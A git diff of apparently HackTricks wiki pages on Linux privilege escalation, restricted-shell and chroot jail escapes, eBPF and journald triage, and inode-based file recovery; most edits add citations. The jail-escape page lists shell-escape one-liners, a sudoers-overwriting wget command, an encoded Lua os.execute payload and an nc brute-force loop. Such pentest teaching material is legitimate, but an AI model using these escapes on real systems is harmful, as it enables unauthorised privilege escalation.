 ### /etc/sysconfig/network-scripts/ (Centos/Redhat)
 
-**Vulnerability reference:** [**https://vulmon.com/exploitdetails?qidtp=maillist_fulldisclosure\&qid=e026a0c5f83df4fd532442e1324ffa4f**](https://vulmon.com/exploitdetails?qidtp=maillist_fulldisclosure&qid=e026a0c5f83df4fd532442e1324ffa4f)<sup>[[20]](#references)</sup>
+**Vulnerability reference:** [**https://vulmon.com/exploitdetails?qidtp=maillist_fulldisclosure\&qid=e026a0c5f83df4fd532442e1324ffa4f**](https://vulmon.com/exploitdetails?qidtp=maillist_fulldisclosure&qid=e026a0c5f83df4fd532442e1324ffa4f).<sup>[[20]](#references)</sup>
 
 If, for whatever reason, a user is able to **write** an `ifcf-<whatever>` script to _/etc/sysconfig/network-scripts_ **or** it can **adjust** an existing one, then your **system is pwned**.<sup>[[20]](#references)</sup>
 
@@ -2345,7 +2345,7 @@ Learn more and see a generalized pattern applicable to other discovery/monitorin
 - [26] [0xdf – HTB Slonik (pg_basebackup cron copy → SUID bash)](https://0xdf.gitlab.io/2026/02/12/htb-slonik.html)
 - [27] [NVISO – You name it, VMware elevates it (CVE-2025-41244)](https://blog.nviso.eu/2025/09/29/you-name-it-vmware-elevates-it-cve-2025-41244/)
 - [28] [Stratascale – CVE-2025-32463: Sudo Chroot Elevation of Privilege](https://www.stratascale.com/resource/cve-2025-32463-sudo-chroot-elevation-of-privilege/)
-- [29] [0xdf – HTB: Expressway](https://0xdf.gitlab.io/2026/03/07/htb-expressway.html)
+- [29] [Rich Mirch – CVE-2025-32462 and CVE-2025-32463 Sudo elevation-of-privilege vulnerabilities](https://blog.mirch.io/sudo-elevation-of-privilege-vulnerabilities/)
 - [30] [0xdf – HTB: Browsed](https://0xdf.gitlab.io/2026/03/28/htb-browsed.html)
 - [31] [PEP 3147 – PYC Repository Directories](https://peps.python.org/pep-3147/)
 - [32] [Python importlib docs](https://docs.python.org/3/library/importlib.html)

--- a/src/linux-hardening/linux-basics/useful-linux-commands.md
+++ b/src/linux-hardening/linux-basics/useful-linux-commands.md
@@ -1,7 +1,5 @@
 # Useful Linux Commands
 
-{{#include ../../banners/hacktricks-training.md}}
-
 ## Common Bash
 
 ```bash
@@ -317,7 +315,7 @@ iptables -P OUTPUT ACCEPT
 
 ## eBPF Telemetry & Rootkit Hunting
 
-Modern rootkits (TripleCross, BPFDoor variants, etc.) increasingly persist as hidden eBPF programs. Baseline your fleet with `bpftool`/`eBPFmon` so you can spot unsigned programs, unexpected cgroup hooks, or malicious map contents before detaching them.<sup>[[1]](#references)</sup>
+Rootkit research has demonstrated both eBPF-based implants such as TripleCross and BPF-based backdoors such as BPFDoor variants. Treat unexpected BPF programs, attachments, or maps as investigation leads rather than proof of compromise.<sup>[[3]](#references)[[4]](#references)</sup> Baseline authorized systems with `bpftool` or `eBPFmon`: `bpftool` can enumerate programs and maps, dump program instructions, and query supported features, while eBPFmon presents that information in a TUI.<sup>[[1]](#references)[[5]](#references)[[6]](#references)</sup>
 
 ```bash
 #Enumerate all eBPF programs, attach points, owning PIDs and map IDs
@@ -337,11 +335,11 @@ sudo bpftool feature probe | less
 sudo ebpfmon
 ```
 
-Correlate the bpftool output with expected NIC/cgroup attachments; a sudden `xdp` or `kprobe` program owned by an unapproved PID is a strong indicator of an injected eBPF payload.
+Correlate the `bpftool` output with expected NIC/cgroup attachments; a sudden `xdp` or `kprobe` program owned by an unapproved PID is an investigation lead, not conclusive proof of an injected payload.<sup>[[5]](#references)[[6]](#references)</sup>
 
 ## Journald Incident Triage
 
-systemd-journald keeps structured metadata, so you can pivot by boot, severity, unit, or UID without touching `/var/log/*`. Combine filters with relative timestamps to isolate attack windows or prove log tampering quickly.<sup>[[2]](#references)</sup>
+`journalctl` reads structured entries from `systemd-journald` and supports filtering by boot, priority, unit, UID, and relative time. Combine those filters with JSON output when you need to preserve or compare evidence; filtering alone does not prove that logs were not tampered with.<sup>[[2]](#references)[[7]](#references)</sup>
 
 ```bash
 journalctl --list-boots                                #Enumerate boot IDs with timestamps
@@ -354,11 +352,16 @@ sudo journalctl --vacuum-size=1G --vacuum-time=7days   #Trim only after taking e
 journalctl --no-pager --since="2025-06-01" --until="2025-06-10" > system_logs_2025-06-01_to_06-10.log
 ```
 
-Add `--grep 'Invalid user' --case-sensitive` or `-k` (kernel ring buffer only) when you need tighter filters, and remember `_PID`, `_SYSTEMD_UNIT`, `_HOSTNAME`, and `_TRANSPORT` selectors stack together for multi-tenant hunts.
+Add `--grep 'Invalid user' --case-sensitive` or `-k` (kernel messages only) when you need tighter filters, and remember `_PID`, `_SYSTEMD_UNIT`, `_HOSTNAME`, and `_TRANSPORT` selectors can be combined for targeted hunts.<sup>[[7]](#references)</sup>
 
 ## References
 
 - [1] [eBPFmon: A new tool for exploring and interacting with eBPF applications](https://redcanary.com/blog/linux-security/ebpfmon/)
 - [2] [How to use the journalctl command to view Linux logs](https://www.hostinger.com/tutorials/journalctl-command)
+- [3] [h3xduck/TripleCross](https://github.com/h3xduck/TripleCross)
+- [4] [Rapid7 Labs: BPFdoor in Telecom Networks](https://www.rapid7.com/blog/post/tr-bpfdoor-telecom-networks-sleeper-cells-threat-research-report/)
+- [5] [BPF Documentation — The Linux Kernel documentation](https://docs.kernel.org/bpf/)
+- [6] [libbpf/bpftool](https://github.com/libbpf/bpftool)
+- [7] [journalctl(1) — Linux manual page](https://man7.org/linux/man-pages/man1/journalctl.1.html)
 
 {{#include ../../banners/hacktricks-training.md}}

--- a/src/linux-hardening/main-system-information/escaping-from-limited-bash.md
+++ b/src/linux-hardening/main-system-information/escaping-from-limited-bash.md
@@ -1,7 +1,5 @@
 # Escaping from Jails
 
-{{#include ../../banners/hacktricks-training.md}}
-
 ## **GTFOBins**
 
 **Search in** [**https://gtfobins.github.io/**](https://gtfobins.github.io) **if you can execute any binary with "Shell" property**
@@ -9,17 +7,17 @@
 ## Chroot Escapes
 
 From [wikipedia](https://en.wikipedia.org/wiki/Chroot#Limitations): The chroot mechanism is **not intended to defend** against intentional tampering by **privileged** (**root**) **users**. On most systems, chroot contexts do not stack properly and chrooted programs **with sufficient privileges may perform a second chroot to break out**.\
-Usually this means that to escape you need to be root inside the chroot.
+Usually this means that to escape you need to be root inside the chroot.<sup>[[4]](#references)</sup>
 
 > [!TIP]
-> The **tool** [**chw00t**](https://github.com/earthquake/chw00t) was created to abuse the following escenarios and scape from `chroot`.<sup>[[1]](#references)</sup>
+> The **tool** [**chw00t**](https://github.com/earthquake/chw00t) was created to abuse the following escenarios and scape from `chroot`.<sup>[[1]](#references)[[5]](#references)</sup>
 
 ### Root + CWD
 
 > [!WARNING]
 > If you are **root** inside a chroot you **can escape** creating **another chroot**. This because 2 chroots cannot coexists (in Linux), so if you create a folder and then **create a new chroot** on that new folder being **you outside of it**, you will now be **outside of the new chroot** and therefore you will be in the FS.
 >
-> This occurs because usually chroot DOESN'T move your working directory to the indicated one, so you can create a chroot but e outside of it.
+> This occurs because usually chroot DOESN'T move your working directory to the indicated one, so you can create a chroot but e outside of it.<sup>[[4]](#references)[[5]](#references)</sup>
 
 Usually you won't find the `chroot` binary inside a chroot jail, but you **could compile, upload and execute** a binary:
 
@@ -85,7 +83,7 @@ system("/bin/bash");
 ### Root + Saved fd
 
 > [!WARNING]
-> This is similar to the previous case, but in this case the **attacker stores a file descriptor to the current directory** and then **creates the chroot in a new folder**. Finally, as he has **access** to that **FD** **outside** of the chroot, he access it and he **escapes**.
+> This is similar to the previous case, but in this case the **attacker stores a file descriptor to the current directory** and then **creates the chroot in a new folder**. Finally, as he has **access** to that **FD** **outside** of the chroot, he access it and he **escapes**.<sup>[[4]](#references)[[5]](#references)</sup>
 
 <details>
 
@@ -124,7 +122,7 @@ int main(void)
 > - Run chroot in child process in a different folder
 > - In parent proc, create a FD of a folder that is outside of new child proc chroot
 > - Pass to child procc that FD using the UDS
-> - Child process chdir to that FD, and because it's ouside of its chroot, he will escape the jail
+> - Child process chdir to that FD, and because it's ouside of its chroot, he will escape the jail.<sup>[[5]](#references)[[6]](#references)</sup>
 
 ### Root + Mount
 
@@ -133,7 +131,7 @@ int main(void)
 > - Mounting root device (/) into a directory inside the chroot
 > - Chrooting into that directory
 >
-> This is possible in Linux
+> This is possible in Linux.<sup>[[5]](#references)</sup>
 
 ### Root + /proc
 
@@ -141,7 +139,7 @@ int main(void)
 >
 > - Mount procfs into a directory inside the chroot (if it isn't yet)
 > - Look for a pid that has a different root/cwd entry, like: /proc/1/root
-> - Chroot into that entry
+> - Chroot into that entry.<sup>[[4]](#references)[[5]](#references)[[7]](#references)</sup>
 
 ### Root(?) + Fork
 
@@ -149,14 +147,14 @@ int main(void)
 >
 > - Create a Fork (child proc) and chroot into a different folder deeper in the FS and CD on it
 > - From the parent process, move the folder where the child process is in a folder previous to the chroot of the children
-> - This children process will find himself outside of the chroot
+> - This children process will find himself outside of the chroot.<sup>[[5]](#references)</sup>
 
 ### ptrace
 
 > [!WARNING]
 >
-> - Time ago users could debug its own processes from a process of itself... but this is not possible by default anymore
-> - Anyway, if it's possible, you could ptrace into a process and execute a shellcode inside of it ([see this example](../interesting-files-permissions/linux-capabilities.md#cap_sys_ptrace)).
+> - Whether a process can attach with `ptrace` depends on credentials, capabilities, and enabled security modules such as Yama; same-user debugging may therefore be restricted by system policy.<sup>[[8]](#references)</sup>
+> - If attachment is permitted, you could ptrace into a process and execute a shellcode inside of it ([see this example](../interesting-files-permissions/linux-capabilities.md#cap_sys_ptrace)).<sup>[[5]](#references)[[8]](#references)</sup>
 
 ## Bash Jails
 
@@ -179,7 +177,7 @@ type -a bash sh rbash ssh vi vim less more man awk find tar zip git scp script 2
 
 ### Modify PATH
 
-Check if you can modify the PATH env variable<sup>[[2]](#references)</sup>
+Check if you can modify the PATH env variable.<sup>[[2]](#references)</sup>
 
 ```bash
 echo $PATH #See the path of the executables that you can use
@@ -188,6 +186,8 @@ echo /home/* #List directory
 ```
 
 ### Using vim
+
+If Vim is available, set its `shell` option to a shell you can execute and invoke `:shell`.<sup>[[10]](#references)</sup>
 
 ```bash
 :set shell=/bin/sh
@@ -208,7 +208,7 @@ man man
 man '-H/bin/sh #' man
 ```
 
-If `git` is available, remember that its help output usually goes through a pager:
+If `git` is available, its `--paginate` option sends output to `less` or `$PAGER`, which is useful when a pager escape is available.<sup>[[9]](#references)</sup>
 
 ```bash
 PAGER='/bin/sh -c "exec sh 0<&1"' git -p help
@@ -229,7 +229,7 @@ script /dev/null -c bash
 ssh localhost /bin/sh
 ```
 
-If you can only **inject arguments** into an allowed command (instead of running it freely), also check **GTFOArgs**.
+If you can only **inject arguments** into an allowed command (instead of running it freely), also check **GTFOArgs**.<sup>[[17]](#references)</sup>
 
 ### Create script
 
@@ -242,7 +242,7 @@ red /bin/bash
 
 ### Get bash from SSH
 
-If you are accessing via ssh you can often ask the server to execute a **different program** instead of the restricted login shell:
+If you are accessing via ssh you can often ask the server to execute a **different program** instead of the restricted login shell.<sup>[[14]](#references)</sup>
 
 ```bash
 ssh -t user@<IP> bash # Get directly an interactive shell
@@ -251,7 +251,7 @@ ssh user@<IP> -t "bash --noprofile -i"
 ssh user@<IP> -t "() { :; }; sh -i "
 ```
 
-If `ssh` is one of the few locally allowed binaries, remember that it can also be abused as a **GTFOBin**:
+If `ssh` is one of the few locally allowed binaries, remember that it can also be abused as a **GTFOBin**; its `LocalCommand` and `ProxyCommand` options execute locally configured helper commands.<sup>[[14]](#references)[[15]](#references)</sup>
 
 ```bash
 ssh localhost /bin/sh
@@ -261,6 +261,8 @@ ssh -o ProxyCommand=';/bin/sh 0<&2 1>&2' x
 
 ### Declare
 
+In Bash, a nameref redirects assignments to another variable, while adding an element to `BASH_CMDS` adds that command to Bash's internal command hash table.<sup>[[11]](#references)[[12]](#references)</sup>
+
 ```bash
 declare -n PATH; export PATH=/bin;bash -i
 
@@ -269,7 +271,7 @@ BASH_CMDS[shell]=/bin/bash;shell -i
 
 ### Wget
 
-You can overwrite for example sudoers file
+Wget's `-O` option writes downloaded content to the specified output file; if that path is writable, this can overwrite a file such as `/etc/sudoers`.<sup>[[13]](#references)</sup>
 
 ```bash
 wget http://127.0.0.1:8080/sudoers -O /etc/sudoers
@@ -309,28 +311,28 @@ Tricks about escaping from python jails in the following page:
 
 ## Lua Jails
 
-In this page you can find the global functions you have access to inside lua: [https://www.gammon.com.au/scripts/doc.php?general=lua_base](https://www.gammon.com.au/scripts/doc.php?general=lua_base)
+In this page you can find the global functions you have access to inside lua: [https://www.gammon.com.au/scripts/doc.php?general=lua_base](https://www.gammon.com.au/scripts/doc.php?general=lua_base).<sup>[[16]](#references)</sup>
 
-**Eval with command execution:**
+The standard `load`, `string.char`, and `os.execute` functions can build and run this chunk when they are available.<sup>[[16]](#references)</sup>
 
 ```bash
 load(string.char(0x6f,0x73,0x2e,0x65,0x78,0x65,0x63,0x75,0x74,0x65,0x28,0x27,0x6c,0x73,0x27,0x29))()
 ```
 
-Some tricks to **call functions of a library without using dots**:
+A table function can also be retrieved with `rawget` instead of dot syntax.<sup>[[16]](#references)</sup>
 
 ```bash
 print(string.char(0x41, 0x42))
 print(rawget(string, "char")(0x41, 0x42))
 ```
 
-Enumerate functions of a library:
+Use `pairs` to enumerate a library table.<sup>[[16]](#references)</sup>
 
 ```bash
 for k,v in pairs(string) do print(k,v) end
 ```
 
-Note that every time you execute the previous one liner in a **different lua environment the order of the functions change**. Therefore if you need to execute one specific function you can perform a brute force attack loading different lua environments and calling the first function of le library:
+The order in which `pairs` enumerates table indices is unspecified, so do not rely on a particular function appearing first. If you need to execute one specific function, you can perform a brute force attack by loading different lua environments and calling the first function of the library.<sup>[[16]](#references)</sup>
 
 ```bash
 #In this scenario you could BF the victim that is generating a new lua environment
@@ -343,7 +345,7 @@ for k,chr in pairs(string) do print(chr(0x6f,0x73,0x2e,0x65,0x78)) end
 for i in seq 1000; do echo "for k1,chr in pairs(string) do for k2,exec in pairs(os) do print(k1,k2) print(exec(chr(0x6f,0x73,0x2e,0x65,0x78,0x65,0x63,0x75,0x74,0x65,0x28,0x27,0x6c,0x73,0x27,0x29))) break end break end" | nc 10.10.10.10 10006 | grep -A5 "Code: char"; done
 ```
 
-**Get interactive lua shell**: If you are inside a limited lua shell you can get a new lua shell (and hopefully unlimited) calling:
+**Get interactive lua shell**: If you are inside a limited lua shell you can get a new lua shell (and hopefully unlimited) by calling `debug.debug()`, which enters an interactive mode.<sup>[[16]](#references)</sup>
 
 ```bash
 debug.debug()
@@ -354,6 +356,19 @@ debug.debug()
 - [1] [Chw00t: How To Break Out from Various Chroot Solutions (Bucsay Balazs, DeepSec talk and slides)](https://www.youtube.com/watch?v=UO618TeyCWo)
 - [2] [GNU Bash Reference Manual – The Restricted Shell](https://www.gnu.org/software/bash/manual/html_node/The-Restricted-Shell.html)
 - [3] [git-shell – Git Documentation](https://git-scm.com/docs/git-shell)
+- [4] [chroot(2) – Linux manual page](https://man7.org/linux/man-pages/man2/chroot.2.html)
+- [5] [chw00t – chroot escape tool](https://github.com/earthquake/chw00t)
+- [6] [unix(7) – Linux manual page](https://man7.org/linux/man-pages/man7/unix.7.html)
+- [7] [proc_pid_root(5) – Linux manual page](https://man7.org/linux/man-pages/man5/proc_pid_root.5.html)
+- [8] [ptrace(2) – Linux manual page](https://man7.org/linux/man-pages/man2/ptrace.2.html)
+- [9] [git – Git Documentation](https://git-scm.com/docs/git)
+- [10] [:shell – Vim documentation](https://vimhelp.org/various.txt.html#%3Ashell)
+- [11] [Bash Builtins – GNU Bash Reference Manual](https://www.gnu.org/software/bash/manual/html_node/Bash-Builtins.html)
+- [12] [Bash Variables – GNU Bash Reference Manual](https://www.gnu.org/software/bash/manual/html_node/Bash-Variables.html)
+- [13] [GNU Wget Manual](https://www.gnu.org/software/wget/manual/wget.html)
+- [14] [ssh(1) – OpenBSD manual page](https://man.openbsd.org/ssh)
+- [15] [ssh_config(5) – OpenBSD manual page](https://man.openbsd.org/ssh_config)
+- [16] [Lua 5.4 Reference Manual](https://www.lua.org/manual/5.4/manual.html)
+- [17] [GTFOArgs: Argument Injection Exploitation Vector List](https://gtfoargs.github.io/)
 
 {{#include ../../banners/hacktricks-training.md}}
-

--- a/src/linux-hardening/main-system-information/filesystem-inodes-and-recovery.md
+++ b/src/linux-hardening/main-system-information/filesystem-inodes-and-recovery.md
@@ -1,16 +1,20 @@
 # Filesystem, Inodes and Recovery
 
-{{#include ../../banners/hacktricks-training.md}}
+Filesystem abuse is often about confusing the relationship between a visible path and the object behind it.
 
-Filesystem abuse is often about confusing the relationship between a visible path and the object behind it. Disk images may hide another filesystem, writable mounts may be consumed by privileged jobs, hardlinks may expose the same inode through a different name, and deleted files may still be readable through an open file descriptor.
+Disk images may hide another filesystem.<sup>[[1]](#references)</sup> Writable mounts may be consumed by privileged jobs.
+
+Hardlinks may expose the same inode through a different name.<sup>[[3]](#references)</sup> Deleted files may still be readable through an open file descriptor.<sup>[[5]](#references)[[6]](#references)</sup>
 
 This page focuses on the technique, not on one specific lab or target.
 
 ## Disk Images and Loop Mounts
 
-A regular file can contain a complete filesystem. Backup images, copied block devices, VM artifacts, or renamed blobs can therefore contain credentials, scripts, SSH keys, configuration files, or flags even when they do not look useful from the outside.
+A regular file can contain a complete filesystem, so a disk image can expose a second filesystem tree when mounted.<sup>[[1]](#references)</sup>
 
-Identify likely images:
+Backup images, copied block devices, VM artifacts, or renamed blobs can therefore contain credentials, scripts, SSH keys, configuration files, or flags even when they do not look useful from the outside.
+
+Identify likely images with `file` to classify a candidate, `blkid` to probe recognized filesystem metadata, and `strings -a` to scan the whole file for printable sequences.<sup>[[10]](#references)[[11]](#references)[[12]](#references)</sup>
 
 ```bash
 file ./candidate
@@ -19,7 +23,7 @@ blkid ./candidate 2>/dev/null
 strings -a ./candidate | head -n 50
 ```
 
-If mounting is allowed, mount unknown images read-only first:
+When mounting is allowed, use a loop mount with `ro` so the image is attached read-only; the `find` command below limits the inspection depth and file type.<sup>[[1]](#references)[[4]](#references)</sup>
 
 ```bash
 mkdir -p /tmp/imgmnt
@@ -28,20 +32,22 @@ find /tmp/imgmnt -maxdepth 3 -type f -ls 2>/dev/null
 sudo umount /tmp/imgmnt
 ```
 
-If mounting is not available, inspect the filesystem metadata directly:
+If mounting is not available and the image is ext2/ext3/ext4, inspect its metadata directly with `debugfs`.<sup>[[2]](#references)</sup>
 
 ```bash
 debugfs -R 'ls -l /' ./candidate 2>/dev/null
 debugfs -R 'stat /' ./candidate 2>/dev/null
 ```
 
-The technique is useful because it turns a normal-looking file into a second filesystem tree. Treat it as a way to recover hidden data, not as a privilege escalation by itself.
+The technique is useful because it turns a normal-looking file into a second filesystem tree.<sup>[[1]](#references)</sup> Treat it as a way to recover hidden data, not as a privilege escalation by itself.
 
 ## Writable Mount Abuse
 
 A writable mount becomes dangerous when a more privileged context later trusts something inside it. The important question is not only "can I write here?", but "who later reads, executes, imports, or loads from here?".
 
-Find writable mounts and suspicious consumers:
+Use `findmnt` to inspect mounted filesystems and their options.<sup>[[9]](#references)</sup>
+
+Find writable mounts and suspicious consumers with the documented `find` permission, type, and filesystem-boundary predicates, then use recursive `grep` to search likely consumer configuration.<sup>[[4]](#references)[[20]](#references)</sup>
 
 ```bash
 findmnt -o TARGET,SOURCE,FSTYPE,OPTIONS
@@ -52,38 +58,40 @@ grep -RniE 'cron|systemd|ExecStart|backup|hook|plugin|sh |bash |python' /mnt /me
 
 Common abuse patterns:
 
-- A privileged cron or systemd unit runs a writable script from the mount.
+- A cron job or systemd service runs a writable script from the mount.<sup>[[13]](#references)[[14]](#references)</sup>
 - A privileged service loads plugins, config, templates, or helper binaries from the mount.
 - A mount contains SUID files and allows modification, replacement, or path manipulation.
-- A container or chroot exposes a host-backed path that is writable from the restricted environment.
+- A container or chroot exposes a host-backed path that is writable from the restricted environment. Mount namespaces provide distinct mount hierarchies, while `chroot()` only changes pathname resolution and is not a full sandbox.<sup>[[15]](#references)[[16]](#references)</sup>
 
-Generic validation pattern:
+Generic validation pattern using the same `find` predicates.<sup>[[4]](#references)</sup>
 
 ```bash
 find /mnt /media /srv /opt -xdev -perm -4000 -type f -ls 2>/dev/null
 find /mnt /media /srv /opt -xdev -type f -writable -ls 2>/dev/null | head -n 50
 ```
 
-When proving impact in an authorized lab, keep the payload observable and minimal, for example writing `id` output to a temporary file. The core technique is delayed execution through a trusted writable location.
+When proving impact in an authorized lab, keep the payload observable and minimal, for example writing `id` output to a temporary file.<sup>[[23]](#references)</sup> The core technique is delayed execution through a trusted writable location.
 
 ## Inodes and Path Confusion
 
-An inode is the filesystem object; a path is only a name pointing to it. This matters because two different paths can point to the same inode, and a deleted pathname does not always mean the data is gone.
+An inode is the filesystem object; a path is only a name pointing to it. Device and inode metadata let you distinguish objects across filesystems, while link counts expose multiple hard links.<sup>[[3]](#references)</sup> A deleted pathname does not always mean the data is gone while a process still has the file open.<sup>[[5]](#references)</sup>
 
-Compare files by inode and device:
+The `find` predicates below compare inode identity, link counts, device boundaries, and timestamps.<sup>[[4]](#references)</sup>
+
+Compare files by inode and device with `ls -i` and `stat` metadata formats.<sup>[[17]](#references)[[18]](#references)</sup>
 
 ```bash
 ls -li /path/a /path/b
 stat -c 'dev=%d inode=%i links=%h mode=%A owner=%U:%G path=%n' /path/a /path/b
 ```
 
-Find every visible pathname for the same inode:
+Find every visible pathname for the same inode with `find -samefile`.<sup>[[4]](#references)</sup>
 
 ```bash
 find / -xdev -samefile /path/to/file -ls 2>/dev/null
 ```
 
-Search directly by inode number when you only have metadata:
+Search directly by inode number with `find -inum` when you only have metadata.<sup>[[4]](#references)</sup>
 
 ```bash
 find / -xdev -inum <inode_number> -ls 2>/dev/null
@@ -93,15 +101,15 @@ This technique is useful when a file appears under an unexpected name, when an a
 
 ## Hardlink Abuse
 
-Hardlinks create multiple names for the same inode. They do not point to a target path like symlinks do; they are equal names for the same file object.
+Hardlinks create multiple names for the same inode. They do not point to a target path like symlinks do; they are equal names for the same file object.<sup>[[3]](#references)</sup>
 
-Find SUID files with multiple hardlinks:
+Find SUID files with multiple hardlinks using `find`'s permission and link-count predicates.<sup>[[4]](#references)</sup>
 
 ```bash
 find / -xdev -perm -4000 -type f -links +1 -ls 2>/dev/null
 ```
 
-Inspect one suspicious file:
+Inspect one suspicious file with `stat` and `find -samefile`.<sup>[[4]](#references)[[17]](#references)</sup>
 
 ```bash
 stat /path/to/suspicious
@@ -114,20 +122,22 @@ Why it matters:
 - A SUID wrapper may be hidden behind a name that does not look privileged.
 - Cleanup that removes one pathname may leave another hardlink alive.
 
-Modern kernels and mount options can restrict hardlink creation to reduce this class of abuse, but existing hardlinks are still worth reviewing.
+Linux's `fs.protected_hardlinks` sysctl can restrict hardlink creation across privilege boundaries.<sup>[[7]](#references)</sup> Existing hardlinks still merit review.
 
 ## Deleted File Recovery Through Open FDs
 
-When a process keeps a file open, the file data can remain available even after the pathname is deleted. Linux exposes those open descriptors under `/proc/<pid>/fd/`.
+When a process keeps a file open, unlinking its last pathname leaves the file alive until the last descriptor closes; Linux exposes those descriptors under `/proc/<pid>/fd/`.<sup>[[5]](#references)[[6]](#references)</sup>
 
-Find deleted open files:
+Find deleted open files by listing `/proc` descriptors and filtering open-file output.<sup>[[5]](#references)[[6]](#references)[[18]](#references)[[19]](#references)[[20]](#references)</sup>
 
 ```bash
 ls -l /proc/*/fd/* 2>/dev/null | grep ' (deleted)' | head -n 50
 lsof 2>/dev/null | grep deleted | head -n 50
 ```
 
-Recover the data when permissions allow it:
+Recovering through these links is permission-dependent because dereferencing `/proc/<pid>/fd` is subject to ptrace access checks and file permissions.<sup>[[6]](#references)</sup>
+
+When permitted, `readlink` shows the descriptor target and `cp` copies its contents.<sup>[[21]](#references)[[22]](#references)</sup>
 
 ```bash
 readlink /proc/<pid>/fd/<fd>
@@ -139,9 +149,9 @@ This is a practical technique for recovering deleted logs, temporary secrets, dr
 
 ## ext Recovery With debugfs
 
-On ext filesystems, `debugfs` can inspect inode metadata and sometimes dump file contents from a filesystem image. Work on a copy or a read-only image whenever possible.
+On ext2/ext3/ext4 filesystems, `debugfs` can inspect inode metadata and dump inode contents from a block device or image; without `-w`, it opens the filesystem read-only.<sup>[[2]](#references)</sup> Work on a copy or a read-only image whenever possible.
 
-List entries and inspect inodes:
+List entries and inspect inodes with `debugfs` requests for directory listings, inode status, and inode-to-path checks.<sup>[[2]](#references)</sup>
 
 ```bash
 debugfs -R 'ls -l /' ./disk.img
@@ -149,20 +159,22 @@ debugfs -R 'stat <inode_number>' ./disk.img
 debugfs -R 'ncheck <inode_number>' ./disk.img
 ```
 
-Dump a known inode:
+Dump a known inode with the `debugfs dump` command, then classify the recovered output with `file`.<sup>[[2]](#references)[[10]](#references)</sup>
 
 ```bash
 debugfs -R 'dump <inode_number> /tmp/recovered.bin' ./disk.img
 file /tmp/recovered.bin
 ```
 
-This is not guaranteed recovery. It depends on filesystem state, whether blocks were reused, and whether the metadata still exists. The technique is still valuable because it lets you inspect inode-level state without relying on normal path traversal.
+This is not guaranteed recovery. It depends on filesystem state, whether blocks were reused, and whether the metadata still exists. For ext3/ext4, the `debugfs` manual notes that deleted-inode recovery may fail because released inode data blocks are no longer available.<sup>[[2]](#references)</sup> The technique is still valuable because it lets you inspect inode-level state without relying on normal path traversal.
 
 ## Inode Exhaustion and Ordering
 
-Inode exhaustion happens when a filesystem runs out of file objects even if free disk space remains. It usually causes reliability failures, but it can also explain strange behavior during incident response or lab triage.
+Inode exhaustion happens when a filesystem runs out of file nodes even if free disk space remains.<sup>[[8]](#references)[[17]](#references)</sup> It usually causes reliability failures, but it can also explain strange behavior during incident response or lab triage.
 
-Check inode pressure:
+Use `df -i` to report inode information instead of block usage.<sup>[[8]](#references)</sup>
+
+Check inode pressure with `df` and a `find` count of directory parents.<sup>[[4]](#references)[[8]](#references)</sup>
 
 ```bash
 df -h
@@ -170,7 +182,9 @@ df -i
 find /var /tmp /home -xdev -printf '%h\n' 2>/dev/null | sort | uniq -c | sort -n | tail
 ```
 
-Inode numbers and timestamps can also help reconstruct activity in simple lab environments:
+Inode numbers and timestamps can also help reconstruct activity in simple lab environments.
+
+The `find` format directives below expose those fields.<sup>[[4]](#references)</sup>
 
 ```bash
 find /path -xdev -printf '%i %TY-%Tm-%Td %TH:%TM %p\n' 2>/dev/null | sort -n | tail -n 50
@@ -181,10 +195,36 @@ Treat ordering as a clue, not proof. Copy operations, archive extraction, filesy
 
 ## Defensive Notes
 
-- Mount unknown images read-only during analysis.
+- Mount unknown images read-only during analysis.<sup>[[1]](#references)</sup>
 - Keep privileged scripts, service units, plugins, and helper paths outside user-writable mounts.
-- Use `nosuid`, `nodev`, and `noexec` where operationally appropriate, but do not treat them as a complete boundary.
-- Restrict access to `/proc/<pid>/fd`, process metadata, and cross-user process inspection where possible.
+- Use `nosuid`, `nodev`, and `noexec` where operationally appropriate; these options disable set-ID/capability execution, device interpretation, or direct binary execution on the mount.<sup>[[1]](#references)</sup> Do not treat them as a complete boundary.
+- Restrict access to `/proc/<pid>/fd`; dereferencing those links is controlled by ptrace access checks and file permissions.<sup>[[6]](#references)</sup> Restrict broader process metadata and cross-user inspection where possible.
 - Monitor writable mount points, unexpected hardlinks to privileged files, and deleted-but-open sensitive files.
+
+## References
+
+- [1] [mount(8) — Linux manual page](https://man7.org/linux/man-pages/man8/mount.8.html)
+- [2] [debugfs(8) — Linux manual page](https://man7.org/linux/man-pages/man8/debugfs.8.html)
+- [3] [inode(7) — Linux manual page](https://man7.org/linux/man-pages/man7/inode.7.html)
+- [4] [find(1) — Linux manual page](https://man7.org/linux/man-pages/man1/find.1.html)
+- [5] [unlink(2) — Linux manual page](https://man7.org/linux/man-pages/man2/unlink.2.html)
+- [6] [proc_pid_fd(5) — Linux manual page](https://man7.org/linux/man-pages/man5/proc_pid_fd.5.html)
+- [7] [Documentation for /proc/sys/fs/ — The Linux Kernel documentation](https://www.kernel.org/doc/html/latest/admin-guide/sysctl/fs.html)
+- [8] [df(1) — Linux manual page](https://man7.org/linux/man-pages/man1/df.1.html)
+- [9] [findmnt(8) — Linux manual page](https://man7.org/linux/man-pages/man8/findmnt.8.html)
+- [10] [file(1) — Linux manual page](https://man7.org/linux/man-pages/man1/file.1.html)
+- [11] [blkid(8) — Linux manual page](https://man7.org/linux/man-pages/man8/blkid.8.html)
+- [12] [strings(1) — Linux manual page](https://man7.org/linux/man-pages/man1/strings.1.html)
+- [13] [crontab(5) — Linux manual page](https://man7.org/linux/man-pages/man5/crontab.5.html)
+- [14] [systemd.service(5) — Linux manual page](https://man7.org/linux/man-pages/man5/systemd.service.5.html)
+- [15] [mount_namespaces(7) — Linux manual page](https://man7.org/linux/man-pages/man7/mount_namespaces.7.html)
+- [16] [chroot(2) — Linux manual page](https://man7.org/linux/man-pages/man2/chroot.2.html)
+- [17] [stat(1) — Linux manual page](https://man7.org/linux/man-pages/man1/stat.1.html)
+- [18] [ls(1) — Linux manual page](https://man7.org/linux/man-pages/man1/ls.1.html)
+- [19] [lsof(8) — Linux manual page](https://man7.org/linux/man-pages/man8/lsof.8.html)
+- [20] [grep(1) — Linux manual page](https://man7.org/linux/man-pages/man1/grep.1.html)
+- [21] [readlink(1) — Linux manual page](https://man7.org/linux/man-pages/man1/readlink.1.html)
+- [22] [cp(1) — Linux manual page](https://man7.org/linux/man-pages/man1/cp.1.html)
+- [23] [id(1) — Linux manual page](https://man7.org/linux/man-pages/man1/id.1.html)
 
 {{#include ../../banners/hacktricks-training.md}}

--- a/src/linux-hardening/main-system-information/kernel-lpe-cves/copy-fail-af_alg-splice-page-cache-overwrite-cve-2026-31431.md
